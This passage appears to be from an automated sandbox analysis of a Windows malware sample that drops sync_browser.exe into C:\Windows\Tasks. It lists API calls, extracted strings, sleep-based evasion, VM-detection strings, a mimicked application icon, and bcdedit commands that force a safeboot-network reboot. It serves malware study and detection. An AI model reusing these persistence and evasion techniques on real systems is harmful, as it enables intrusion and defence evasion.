networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
                          Source: GIjul8.QTIrrr.0.dr Binary or memory string: bcdedit.exe
                          Source: GIjul8.QTIrrr.0.dr Binary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 23_2_00007FF7E50C7650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,23_2_00007FF7E50C7650
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 23_2_00007FF7E50C7EB0 GetPrivateProfileIntA,23_2_00007FF7E50C7EB0
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 23_2_00007FF7E50C7D50 GetPrivateProfileIntA,23_2_00007FF7E50C7D50
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 23_2_00007FF7E50C7E10 GetPrivateProfileIntA,23_2_00007FF7E50C7E10
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 23_2_00007FF7E50C78E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,23_2_00007FF7E50C78E0
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 23_2_00007FF7E50C7750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,23_2_00007FF7E50C7750
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 23_2_00007FF7E50C7F50 GetPrivateProfileIntA,23_2_00007FF7E50C7F50
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 23_2_00007FF7E50C77F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,23_2_00007FF7E50C77F0
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 23_2_00007FF7E50C9A40 GetPrivateProfileIntA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetPrivateProfileIntA,23_2_00007FF7E50C9A40
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 23_2_00007FF7E50781AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStrin23_2_00007FF7E50781AD
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 23_2_00007FF7E507E1D0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,_itow,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivat23_2_00007FF7E507E1D0
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 23_2_00007FF7E50C7C90 GetPrivateProfileIntA,23_2_00007FF7E50C7C90
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 23_2_00007FF7E50C7BD0 GetPrivateProfileIntA,23_2_00007FF7E50C7BD0
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 26_2_00007FF7E50C7650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,26_2_00007FF7E50C7650
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 26_2_00007FF7E50C7EB0 GetPrivateProfileIntA,26_2_00007FF7E50C7EB0
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 26_2_00007FF7E50C7D50 GetPrivateProfileIntA,26_2_00007FF7E50C7D50
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 26_2_00007FF7E50C7E10 GetPrivateProfileIntA,26_2_00007FF7E50C7E10
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 26_2_00007FF7E50C78E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,26_2_00007FF7E50C78E0
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 26_2_00007FF7E50C7750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,26_2_00007FF7E50C7750
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 26_2_00007FF7E50C7F50 GetPrivateProfileIntA,26_2_00007FF7E50C7F50
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 26_2_00007FF7E50C77F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,26_2_00007FF7E50C77F0
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 26_2_00007FF7E50C9A40 GetPrivateProfileIntA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetPrivateProfileIntA,26_2_00007FF7E50C9A40
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 26_2_00007FF7E50781AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStrin26_2_00007FF7E50781AD
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 26_2_00007FF7E507E1D0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,_itow,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivat26_2_00007FF7E507E1D0
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 26_2_00007FF7E50C7C90 GetPrivateProfileIntA,26_2_00007FF7E50C7C90
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 26_2_00007FF7E50C7BD0 GetPrivateProfileIntA,26_2_00007FF7E50C7BD0
                          Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Windows\Tasks\5482310161066753

                          Hooking and other Techniques for Hiding and Protection

                          Source: initial sample Icon embedded in binary file: icon matches a legit application icon: download (98).png
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 23_2_00007FF7E50A48B0 IsIconic,IsWindowVisible,GetWindowRect,SHAppBarMessage,23_2_00007FF7E50A48B0
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 26_2_00007FF7E50A48B0 IsIconic,IsWindowVisible,GetWindowRect,SHAppBarMessage,26_2_00007FF7E50A48B0
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 23_2_00007FF7E50A3E20 OpenInputDesktop,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,SetThreadDesktop,LoadLibraryA,GetProcAddress,GetStockObject,RegisterClassExA,SetEvent,CreateWindowExA,SetTimer,SetWindowLongPtrA,SetClipboardViewer,CreateThread,CloseHandle,GetModuleFileNameA,GetModuleFileNameA,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetEvent,PeekMessageA,Sleep,CreateRectRgn,CombineRgn,DeleteObject,free,SetEvent,SetEvent,SetEvent,TranslateMessage,DispatchMessageA,WaitMessage,DestroyWindow,DestroyWindow,SetEvent,KillTimer,FreeLibrary,FreeLibrary,FreeLibrary,SetThreadDesktop,CloseDesktop,23_2_00007FF7E50A3E20
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Tasks\sync_browser.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 23_2_00007FF7E50D9BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,23_2_00007FF7E50D9BC0
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,OpenServiceA,QueryServiceConfigA,GetLastError,QueryServiceConfigA,CloseServiceHandle,CloseServiceHandle,23_2_00007FF7E5079D00
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,OpenServiceA,QueryServiceConfigA,GetLastError,QueryServiceConfigA,CloseServiceHandle,CloseServiceHandle,26_2_00007FF7E5079D00
                          Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 433
                          Source: C:\Windows\Tasks\sync_browser.exe Window / User API: threadDelayed 1352
                          Source: C:\Windows\SysWOW64\timeout.exe Window / User API: threadDelayed 363
                          Source: C:\Windows\SysWOW64\timeout.exe Window / User API: threadDelayed 365
                          Source: C:\Windows\SysWOW64\timeout.exe Window / User API: threadDelayed 362
                          Source: C:\Windows\Tasks\sync_browser.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_23-22293
                          Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Windows\Tasks\sdABZ4.E1924R
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\sdABZ4.E1924R
                          Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Windows\Tasks\conhost.exe
                          Source: C:\Windows\Tasks\sync_browser.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_23-22671
                          Source: C:\Windows\Tasks\sync_browser.exe API coverage: 3.5 %
                          Source: C:\Windows\Tasks\sync_browser.exe API coverage: 1.2 %
                          Source: C:\Windows\Tasks\sync_browser.exe TID: 1056 Thread sleep time: -135200s >= -30000s
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 3920 Thread sleep count: 61 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 336 Thread sleep count: 33 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 7484 Thread sleep count: 363 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 7484 Thread sleep time: -36300s >= -30000s
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 7312 Thread sleep count: 365 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 7312 Thread sleep time: -36500s >= -30000s
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 4816 Thread sleep count: 362 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 4816 Thread sleep time: -36200s >= -30000s
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 6560 Thread sleep count: 317 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 6560 Thread sleep time: -31700s >= -30000s
                          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                          Source: C:\Windows\Tasks\sync_browser.exe Last function: Thread delayed
                          Source: C:\Windows\SysWOW64\timeout.exe Last function: Thread delayed
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe Code function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_00403387
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe Code function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402EE6
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 23_2_00007FF7E5096DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,23_2_00007FF7E5096DD1
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 23_2_00007FF7E5075910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,23_2_00007FF7E5075910
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 23_2_00007FF7E512A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,23_2_00007FF7E512A228
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 23_2_00007FF7E509C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,23_2_00007FF7E509C210
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 26_2_00007FF7E5096DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,26_2_00007FF7E5096DD1
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 26_2_00007FF7E5075910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,26_2_00007FF7E5075910
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 26_2_00007FF7E512A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,26_2_00007FF7E512A228
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 26_2_00007FF7E509C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,26_2_00007FF7E509C210
                          Source: C:\Windows\Tasks\sync_browser.exe Code function: 23_2_00007FF7E5076060 GetProcAddress,GetVersion,GetProcAddress,GetSystemInfo,GetSystemInfo,23_2_00007FF7E5076060
Source: sync_browser.exe, 0000001A.00000002.1499997425.00000000017D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Shutdown Service
Source: sync_browser.exe, 00000017.00000002.3170525650.0000000002CB6000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 0000001A.00000002.1500112445.0000000003266000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 0000001A.00000002.1499997425.00000000017D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: sync_browser.exe, 0000001A.00000002.1499997425.00000000017D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmicshutdown
Source: sync_browser.exe, 0000001A.00000002.1499997425.00000000017D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: sync_browser.exe, 00000017.00000002.3170525650.0000000002CB6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pSST Authoty\NetLocalSystemHyper-V Guest Service Interface
Source: sync_browser.exe, 0000001A.00000002.1500112445.0000000003266000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 0000001A.00000002.1499997425.00000000017D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V PowerShell Direct Service
Source: sync_browser.exe, 0000001A.00000002.1499997425.00000000017D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Time Synchronization Service
Source: sync_browser.exe, 00000017.00000002.3170525650.0000000002CB6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\Windows\system32\svchost.exe -k ICService -pCSSLaLocalSystemionHyper-V Remote Desktop Virtualization Serviceration
